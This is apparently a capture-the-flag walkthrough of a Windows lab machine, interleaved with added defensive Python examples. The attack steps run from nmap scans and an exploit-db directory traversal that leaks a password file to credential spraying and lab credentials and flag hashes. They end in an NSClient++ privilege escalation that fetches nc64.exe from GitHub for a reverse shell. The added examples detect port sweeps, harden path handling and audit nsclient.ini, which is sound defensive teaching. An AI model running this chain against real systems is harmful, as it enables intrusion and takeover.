Network Scanning
IP=10.10.10.184
sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, starting udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -oN udp --min-rate 1000 $IP
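From the target's side, the full-port sweeps above show up as one source touching a very large number of distinct ports in seconds. As an added example (not part of the original writeup), the detection below runs that check over constructed flow-log lines; the "timestamp src dst dport" record format, the 192.0.2.x source addresses, and the 60-second/20-port thresholds are all assumptions to adapt to your own logs.

```python
# Added example (not part of the original writeup): flag sources that contact
# many distinct destination ports on one host inside a short window, which is
# what a fast TCP sweep looks like in firewall or flow logs. The log format is
# a constructed "timestamp src dst dport" record, not any vendor's real format.
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_log():
    """Constructed sample: one scanning source and one ordinary client."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    lines = []
    # 192.0.2.10 (constructed scanner IP) touches 40 distinct ports in 4 seconds,
    # roughly what --min-rate 1000 -p- looks like from the target's side.
    for i, port in enumerate(range(1, 41)):
        ts = base + timedelta(milliseconds=100 * i)
        lines.append(f"{ts.isoformat()} 192.0.2.10 10.10.10.184 {port}")
    # 192.0.2.20 (constructed client IP) reaches a few service ports over minutes.
    for i, port in enumerate((80, 443, 80, 8443)):
        ts = base + timedelta(minutes=3 * i)
        lines.append(f"{ts.isoformat()} 192.0.2.20 10.10.10.184 {port}")
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


def parse_line(line):
    """Parse one 'timestamp src dst dport' record into typed fields."""
    ts, src, dst, dport = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport)


def find_scanners(log_text, window=timedelta(seconds=60), threshold=20):
    """Return {(src, dst): max_distinct_ports} for every source/destination
    pair that contacted at least `threshold` distinct ports within any
    `window`. A sliding window over the per-pair events keeps a count of
    each port seen, so a burst and a slower broad sweep are caught alike."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = parse_line(line)
        events[(src, dst)].append((ts, dport))

    hits = {}
    for pair, evs in events.items():
        evs.sort()
        port_counts = {}
        left = 0
        best = 0
        for ts, port in evs:
            port_counts[port] = port_counts.get(port, 0) + 1
            # Drop events that fell out of the window on the left edge.
            while ts - evs[left][0] > window:
                old_port = evs[left][1]
                port_counts[old_port] -= 1
                if port_counts[old_port] == 0:
                    del port_counts[old_port]
                left += 1
            best = max(best, len(port_counts))
        if best >= threshold:
            hits[pair] = best
    return hits


if __name__ == "__main__":
    for (src, dst), n in find_scanners(SAMPLE_LOG).items():
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports in 60s")
```

Only the constructed scanner address is reported; the ordinary client never exceeds one distinct port per window. Lowering the rate (the `alltcpslow` run above) stretches the sweep over a longer window, which is why the threshold and window are parameters rather than constants.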
FTP
Anonymous access is enabled
Two users: Nadine, Nathan
Each has a file.
Interesting entries regarding initial access:
- Remove public access to NVMS
searchsploit nvms-1000
We see a directory traversal
python2.7 48311.py http://10.10.10.184/ windows/system32/drivers/etc/hosts out.txt
The previous note references where to find creds
Let's see if we can leak the file.
python2.7 48311.py http://10.10.10.184/ Users/nathan/Desktop/Passwords.txt pass
This wasn't working; trying the other PoC in Burp works.
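The traversal above works because the server joins the requested path onto its document root and opens whatever results. As an added example (not the NVMS code and not part of the original writeup), the snippet below shows that vulnerable pattern next to a hardened resolver that decodes, normalises, and then checks containment on the resolved path; the directory layout and filenames are constructed for the demo.

```python
# Added example (not part of the original writeup): read_file_unsafe() is the
# join-and-open pattern that makes directory traversal possible;
# read_file_safe() is the hardened version. Both are hypothetical, not NVMS code.
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def read_file_unsafe(webroot, requested):
    """Vulnerable pattern: '../' segments in `requested` walk out of webroot,
    and on POSIX an absolute `requested` makes os.path.join discard webroot."""
    with open(os.path.join(webroot, requested), "rb") as fh:
        return fh.read()


def safe_resolve(webroot, requested):
    """Map a client-supplied path to a file inside webroot or raise."""
    root = Path(webroot).resolve()
    # Decode twice so a double-encoded '..' is not missed.
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Normalise separators and drop leading slashes so the join stays relative.
    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = (root / relative).resolve()
    # Containment is checked on the *resolved* path, so symlinks and '..'
    # have already been collapsed before the comparison.
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"{requested!r} escapes the web root")
    if not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate


def read_file_safe(webroot, requested):
    return safe_resolve(webroot, requested).read_bytes()


def demo():
    """Build a throwaway tree (constructed) and compare both readers.
    Returns a dict of booleans so the behaviour can be checked."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = Path(tmp) / "www"
        webroot.mkdir()
        (webroot / "index.html").write_text("hello")
        (Path(tmp) / "secret.txt").write_text("creds")  # outside the web root

        results = {
            "unsafe_escapes": read_file_unsafe(str(webroot), "../secret.txt") == b"creds",
            "safe_serves_normal_file": read_file_safe(str(webroot), "index.html") == b"hello",
        }
        attempts = [
            "../secret.txt",
            "..%2fsecret.txt",               # URL-encoded separator
            "%252e%252e/secret.txt",         # double-encoded dots
            "..\\secret.txt",                # Windows separator
            str(Path(tmp) / "secret.txt"),   # absolute path
        ]
        blocked = 0
        for attempt in attempts:
            try:
                read_file_safe(str(webroot), attempt)
            except (PermissionError, FileNotFoundError, ValueError):
                blocked += 1
        results["safe_blocks_all_attempts"] = blocked == len(attempts)
        return results


if __name__ == "__main__":
    print(demo())
```

The order of operations is the point: decode, then normalise, then resolve, then compare against the resolved root. Checking for a literal `../` in the raw request string before decoding is what lets the encoded forms through.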
Make a password list
Check against SMB with nxc
nxc smb 10.10.10.184 -u nadine -p pass --shares --local-auth
nadine:L1k3B1gBut7s@W0rk
SSH is running; let's see if we can log in.
ssh nadine@10.10.10.184
13a2b7d3da9dd1186daceb9a640ed297
Priv Esc
We can use: windows/local/46802.txt
web panel password
ew2x6SsGTxjRwXOT
We can’t login
Looking at the config file again, we see it's only allowing access via localhost.
We may be able to use ssh to route our web traffic through the local interface.
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
We can access it locally!
We can login!
Now we can enable:
- CheckExternalScripts
- Scheduler
get nc.exe
wget https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -O nc.exe
download to disk
setup a listener
Build script
Now we save the configuration and reload the service:
wait for a shell
This wasn’t working - I tried a million permutations.
Eventually, I found you can run your custom commands via the console instead of waiting for the scheduler to execute it.
And we catch a shell
871ec5458cf91db144daf11d89111a40
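The service behind the 8443 panel, with its CheckExternalScripts and Scheduler modules, is NSClient++ (exploit-db 46802 is its privilege-escalation entry). The whole chain above depends on three settings at once: external scripts enabled, a scheduler to run them, and an "allowed hosts" restriction of 127.0.0.1 that a local account defeats with an SSH forward. As an added example (not part of the original writeup and not NSClient++ code), the audit below reads an nsclient.ini-style file and flags that combination; the section and key names follow the nsclient.ini layout as I recall it and should be verified against your installed version, and both configs are constructed.

```python
# Added example (not part of the original writeup): audit an NSClient++-style
# nsclient.ini for the settings the priv esc above relies on. Section/key names
# ([/settings/default] allowed hosts, [/modules] CheckExternalScripts) are as I
# recall the nsclient.ini layout; verify against your version. Both configs
# below are constructed, including the placeholder password.
import configparser

WEAK_INI = """\
[/settings/default]
allowed hosts = 127.0.0.1
password = changeme-constructed

[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
"""

HARDENED_INI = """\
[/settings/default]
allowed hosts = 127.0.0.1
password = changeme-constructed

[/modules]
CheckExternalScripts = disabled
Scheduler = disabled
"""

TRUTHY = {"enabled", "true", "1", "yes"}


def enabled_modules(cp):
    """Names of modules whose value reads as enabled."""
    if not cp.has_section("/modules"):
        return set()
    return {name for name, value in cp.items("/modules")
            if value.strip().lower() in TRUTHY}


def audit(ini_text):
    """Return a list of finding codes; an empty list means nothing flagged."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep module names case-sensitive
    cp.read_string(ini_text)

    findings = []
    modules = enabled_modules(cp)
    allowed = cp.get("/settings/default", "allowed hosts", fallback="").strip()

    if "CheckExternalScripts" in modules:
        # Anyone who can authenticate to the web API can define and run a
        # script as the service account (typically SYSTEM).
        findings.append("external-scripts-enabled")
        if "Scheduler" in modules:
            # Scheduler turns that into an unattended, recurring execution path.
            findings.append("scheduler-with-external-scripts")
        if allowed in ("127.0.0.1", "localhost", "::1"):
            # Loopback-only is not a security boundary once any local account
            # exists: an SSH -L forward reaches the listener from outside.
            findings.append("loopback-acl-is-not-a-boundary")
    return findings


if __name__ == "__main__":
    print("weak:", audit(WEAK_INI))
    print("hardened:", audit(HARDENED_INI))
```

The hardened config keeps the loopback restriction but disables the two modules, which is why it produces no findings: the restriction is only flagged when there is something behind it worth reaching. The panel password also lives in plaintext in the same file, which is how it was recovered above, so file permissions on nsclient.ini matter as much as the module toggles.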